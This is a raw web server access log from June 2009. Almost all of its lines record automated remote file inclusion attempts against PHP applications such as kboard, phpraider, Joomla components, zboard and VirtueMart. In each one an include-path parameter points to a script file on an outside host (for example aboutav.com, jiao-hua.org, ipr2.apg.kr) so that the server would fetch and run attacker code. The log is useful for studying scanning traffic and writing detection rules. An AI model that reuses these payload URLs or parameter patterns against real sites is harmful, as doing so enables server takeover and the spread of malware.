83.98.209.71 - - [27/Jun/2009:11:12:47 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//id2.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
212.175.12.133 - - [27/Jun/2009:11:13:11 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.175.12.133 - - [27/Jun/2009:11:13:11 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.175.12.133 - - [27/Jun/2009:11:13:17 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
83.98.209.71 - - [27/Jun/2009:11:14:17 -0500] "GET /logs/access_log.1230854400//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:11:14:17 -0500] "GET /logs/access_log.1230768000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:11:14:35 -0500] "GET /logs/access_log.1230854400//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:11:14:35 -0500] "GET /logs/access_log.1230768000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
212.175.12.133 - - [27/Jun/2009:11:14:42 -0500] "GET /logs/access_log.1229472000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.30.100.97 - - [27/Jun/2009:11:15:52 -0500] "GET /logs/access_log.1240272000//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:11:15:52 -0500] "GET /logs//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:11:15:52 -0500] "GET //phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:11:16:09 -0500] "GET //phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:11:16:09 -0500] "GET /logs/access_log.1240272000//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:11:16:09 -0500] "GET /logs//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:11:17:33 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:11:17:33 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:11:17:33 -0500] "GET /logs/access_log.1236038400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:17:35 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:17:40 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:17:40 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:17:49 -0500] "GET /logs/access_log.1230508800//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:17:49 -0500] "GET /logs/access_log.1232409600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.175.12.133 - - [27/Jun/2009:11:17:57 -0500] "GET /logs/access_log.1240444800//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.175.12.133 - - [27/Jun/2009:11:17:57 -0500] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.175.12.133 - - [27/Jun/2009:11:17:57 -0500] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
83.98.209.71 - - [27/Jun/2009:11:18:04 -0500] "GET /logs/access_log.1230508800//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:18:09 -0500] "GET /logs/access_log.1232409600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:11:18:13 -0500] "GET /logs/access_log.1236124800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:11:19:20 -0500] "GET //phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:11:19:20 -0500] "GET /logs//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:11:19:20 -0500] "GET /logs/access_log.1240272000//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:21:09 -0500] "GET /logs/access_log.1230508800//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:21:09 -0500] "GET /logs/access_log.1232409600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.175.12.133 - - [27/Jun/2009:11:21:44 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.175.12.133 - - [27/Jun/2009:11:21:44 -0500] "GET //include/mail.inc.php?skin_board_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.175.12.133 - - [27/Jun/2009:11:21:44 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.175.12.133 - - [27/Jun/2009:11:21:44 -0500] "GET /logs/access_log.1227571200//include/mail.inc.php?skin_board_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
200.107.138.34 - - [27/Jun/2009:11:22:09 -0500] "GET /logs/access_log.1241654400/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
67.19.130.218 - - [27/Jun/2009:11:22:23 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.19.130.218 - - [27/Jun/2009:11:22:23 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.19.130.218 - - [27/Jun/2009:11:22:23 -0500] "GET /logs/access_log.1240617600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.19.130.218 - - [27/Jun/2009:11:22:29 -0500] "GET /logs/access_log.1240358400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:23:27 -0500] "GET //include/mail.inc.php?skin_board_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:11:23:27 -0500] "GET /logs/access_log.1227571200//include/mail.inc.php?skin_board_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:11:23:27 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:11:23:31 -0500] "GET //include/mail.inc.php?skin_board_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:11:23:31 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:11:23:31 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:11:24:02 -0500] "GET /logs/access_log.1227571200//include/mail.inc.php?skin_board_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
60.251.217.4 - - [27/Jun/2009:11:27:30 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:27:35 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:27:46 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:30:51 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:30:51 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:30:52 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:33:49 -0500] "GET //ashnews.php?pathtoashnews=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:33:49 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:33:49 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:34:15 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:34:15 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:34:15 -0500] "GET //include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:34:30 -0500] "GET //include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:34:30 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:34:30 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:34:49 -0500] "GET /logs/access_log.1242000000//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:35:04 -0500] "GET /logs/access_log.1242000000//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:35:46 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:35:46 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:35:47 -0500] "GET //include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:36:19 -0500] "GET /logs/access_log.1242000000//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:37:41 -0500] "GET /logs/access_log.1232409600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:37:41 -0500] "GET /logs/access_log.1230508800//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:37:46 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:38:21 -0500] "GET /logs/header.php?base_folder=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:38:21 -0500] "GET /header.php?base_folder=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:38:21 -0500] "GET /logs/access_log.1239062400/header.php?base_folder=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:38:21 -0500] "GET /logs/access_log.1236384000/header.php?base_folder=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:11:41:07 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:11:41:07 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:11:41:08 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:11:42:07 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.147.206 - - [27/Jun/2009:11:43:18 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
85.214.147.206 - - [27/Jun/2009:11:43:18 -0500] "GET /logs/access_log.1241827200///?_SERVER[DOCUMENT_ROOT]=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.214.147.206 - - [27/Jun/2009:11:43:18 -0500] "GET /logs/access_log.1241308800///?_SERVER[DOCUMENT_ROOT]=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.214.147.206 - - [27/Jun/2009:11:43:19 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 200 194918 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:11:43:54 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:46:42 -0500] "GET /logs/access_log.1230076800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:46:42 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:46:42 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.107 - - [27/Jun/2009:11:47:03 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.98.209.71 - - [27/Jun/2009:11:47:25 -0500] "GET /outlogin.php?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:11:47:25 -0500] "GET /logs/access_log.1230940800/outlogin.php?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:11:47:25 -0500] "GET /logs/outlogin.php?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
60.251.217.4 - - [27/Jun/2009:11:47:59 -0500] "GET /logs/access_log.1232236800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:48:45 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:48:51 -0500] "GET /logs/access_log.1239408000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:48:51 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:48:53 -0500] "GET /outlogin.php?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:11:48:53 -0500] "GET /logs/access_log.1230940800/outlogin.php?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:11:48:53 -0500] "GET /logs/outlogin.php?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
216.17.99.13 - - [27/Jun/2009:11:51:08 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 304 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:11:51:08 -0500] "GET /convert/mvcw.php?vwar_root=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.826"
60.251.217.4 - - [27/Jun/2009:11:52:03 -0500] "GET /logs/access_log.1240444800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.106.107 - - [27/Jun/2009:11:52:24 -0500] "GET /logs/access_log.1147305600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
60.251.217.4 - - [27/Jun/2009:11:52:34 -0500] "GET /logs/access_log.1232409600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:11:52:35 -0500] "GET /logs/access_log.1230508800//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:53:02 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 319 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:53:02 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 314 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:53:03 -0500] "GET /logs/access_log.1235174400//components/com_simpleboard/file_upload.php?sbp=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 341 "-""Mozilla/5.0"
218.38.136.16 - - [27/Jun/2009:11:53:22 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 194918 "-""libwww-perl/5.79"
218.38.136.16 - - [27/Jun/2009:11:53:22 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:11:53:28 -0500] "GET /logs/access_log.1240963200/outlogin.php?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
